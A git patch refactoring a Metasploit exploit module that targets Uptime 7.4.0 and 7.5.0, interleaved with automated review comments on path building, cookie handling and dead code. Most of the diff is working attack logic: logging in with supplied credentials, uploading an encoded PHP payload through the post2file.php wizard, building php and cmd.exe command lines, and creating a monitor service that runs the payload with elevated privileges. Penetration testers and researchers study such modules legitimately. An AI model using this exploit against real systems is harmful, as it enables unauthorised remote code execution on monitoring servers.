From 5539363218f1815d762b8ece7419351414a80ce7 Mon Sep 17 00:00:00 2001
From: "Ewerson Guimaraes (Crash)"
Date: Fri, 23 Oct 2015 11:33:59 +0200
Subject: [PATCH] Update uptime_code_exec.rb
---
.../exploits/multi/http/uptime_code_exec.rb | 106 +++++++++---------
1 file changed, 55 insertions(+), 51 deletions(-)
diff --git a/modules/exploits/multi/http/uptime_code_exec.rb b/modules/exploits/multi/http/uptime_code_exec.rb
index 460042675f..b0fe4b0ce3 100644
--- a/modules/exploits/multi/http/uptime_code_exec.rb
+++ b/modules/exploits/multi/http/uptime_code_exec.rb
@@ -10,44 +10,45 @@ class Metasploit4 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file', - 'Description' => ' - This module exploits a vulnerability found in Uptime - version 7.4.0 and 7.5.0 By supplying a specially - crafted request is possible to upload file and execute - arbitrary commands through privilege escalation. - ', - 'License' => MSF_LICENSE, - 'Author' => [ - 'Ewerson Guimaraes(Crash) ', - 'Gjoko Krstic(LiquidWorm) ' - ], - 'References' => [ - ['URL', 'https://www.exploit-db.com/exploits/37888/'] - ], - 'Payload' => { - 'Space' => 100_000, - 'DisableNops' => true - }, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => [ - ['Automatic', {}] - ], - 'DefaultOptions' => { - 'SSL' => false - }, - 'Privileged' => 'True', - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Aug 6 2015' - )) + 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file', + 'Description' => %q{ + This module exploits a vulnerability found in Uptime + version 7.4.0 and 7.5.0 By supplying a specially + crafted request is possible to upload file and execute + arbitrary commands through privilege escalation. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ewerson Guimaraes(Crash) ', + 'Gjoko Krstic(LiquidWorm) ' + ], + 'References' => + [ + ['EDB', '37888'] + ], + 'Payload' => + { + 'Space' => 100_000, + 'DisableNops' => true + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic', {}]], + 'DefaultOptions' => + { + 'SSL' => false + }, + 'Privileged' => 'True', + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 6 2015')) - register_options([ - Opt::RPORT(9999), - OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), - OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) - - ], self.class) + register_options( + [ + Opt::RPORT(9999), + OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), + OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) + ], self.class) end # Application Check def check @@ -57,7 +58,7 @@ class Metasploit4 < Msf::Exploit::Remote ) vprint_status("#{peer} - Checking version...") - if !res.nil? && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0')) + if res && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0')) return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe 
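Review bot: In the `@@ -10,44 +10,45 @@` hunk, `'Privileged' => 'True'` is carried over as a String rather than a boolean. Any non-nil String is truthy in Ruby, so `'False'` would behave the same way; write it as `'Privileged' => true`. The re-indented `'Description'` still runs two sentences together ("version 7.4.0 and 7.5.0 By supplying a specially crafted request is possible to upload file"), which could be split and corrected while the block is being touched.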
@@ -76,21 +77,23 @@ class Metasploit4 < Msf::Exploit::Remote # #Check OS # phpfile_name = rand_text_alpha(10) - if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/ + if res_auth && res_auth.headers['Server'] =~ /Unix/ vprint_status('Found Linux installation - Setting appropriated PATH') phppath = '/usr/local/uptime/apache/bin/php' uploadpath = '/usr/local/uptime/GUI/wizards' - cmdargs = uploadpath + '/' + phpfile_name + '.txt' +## cmdargs = uploadpath + '/' + phpfile_name + '.txt' + cmdargs = "#{uploadpath}#{phpfile_name}.txt" cmd = phppath else vprint_status('Found Windows installation - Setting appropriated PATH') phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe' - uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards' + uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\' cmd = 'c:\\windows\\system32\\cmd.exe' - cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"' +## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"' + cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\"" end - if !res_auth.nil? && res_auth.get_cookies =~ /login=true/ + if res_auth && res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") @@ -119,7 +122,7 @@ class Metasploit4 < Msf::Exploit::Remote 'subsection' => 'edit', 'id' => "#{get_id}" }, - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'operation' => 'submit', 'disableEditOfUsernameRoleGroup' => 'false', 
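Review bot: The interpolated `cmdargs` in the Unix branch of `@@ -76,21 +77,23 @@` is not equivalent to the concatenation it replaces. `uploadpath` there still has no trailing separator, so `"#{uploadpath}#{phpfile_name}.txt"` produces a different path than the commented-out `uploadpath + '/' + phpfile_name + '.txt'`, whereas the Windows branch compensates by appending `\\` to `uploadpath`. Keep the two branches consistent, for example `cmdargs = "#{uploadpath}/#{phpfile_name}.txt"`, and check the changed Windows `uploadpath` against its other use as an argument to `create_exec_service` in `@@ -261,7 +264,7 @@`. The old lines are left behind as `##` comments here and in `@@ -277,7 +280,8 @@`; delete them, since the diff already records the history. The enclosing method starts and ends outside the hunk.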
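Review bot: The `'cookie'` value in `@@ -119,7 +122,7 @@`, and again in `@@ -152,7 +155,7 @@` and `@@ -177,10 +180,10 @@`, is built from `cookie_split[1]` and `cookie_split[2]`, which are positional indices into `res_auth.get_cookies.split(';')`. If the response carries fewer cookies or a different order, the interpolation silently yields empty or wrong fragments with no diagnostic. Build the header once after login, with a guard that reports a clear error when the expected entries are missing. A comment such as `# cookie_split[1] and [2] hold the session cookies set at login` would document the assumption; which cookies those are is not visible in the diff. The enclosing request call is only partly visible in the hunk.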
@@ -152,7 +155,7 @@ class Metasploit4 < Msf::Exploit::Remote res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'), - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" + 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) res_auth = send_request_cgi( @@ -163,7 +166,7 @@ class Metasploit4 < Msf::Exploit::Remote 'password' => datastore['PASSWORD'] } ) - if !res_auth.nil? && res_auth.get_cookies =~ /login=true/ + if res_auth && res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") @@ -177,10 +180,10 @@ class Metasploit4 < Msf::Exploit::Remote res_service = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'section' => 'ERDCInstance', - 'subsection' => 'add' + 'subsection' => 'add', }, 'vars_post' => { 'initialERDCId' => '20', @@ -261,7 +264,7 @@ class Metasploit4 < Msf::Exploit::Remote end # CREATING Linux EXEC Service - if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/ + if res_auth && res_auth.headers['Server'] =~ /Unix/ vprint_status('Creating Linux Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) @@ -277,7 +280,8 @@ class Metasploit4 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'), 'vars_post' => { - 'file_name' => phpfile_name + '.txt', +## 'file_name' => phpfile_name + '.txt', + 'file_name' => "#{phpfile_name}.txt", 'script' => payload.encoded } ) 
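Review bot: `cookie = Regexp.last_match(1)`, directly after the changed condition in `@@ -163,7 +166,7 @@`, always assigns `nil` because `/login=true/` has no capture group. The same pair of lines appears in `@@ -76,21 +77,23 @@`. Nothing in the visible hunks reads `cookie`, so the assignment looks like dead code and could be dropped in both places. The surrounding method lies outside the hunk, so confirm there is no later use before removing it.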
@@ -288,7 +292,7 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt") ) - if !res_up_check.nil? && res_up_check.code == 200 + if res_up_check && res_up_check.code == 200 print_good("File found: #{phpfile_name}") else print_error('File not found')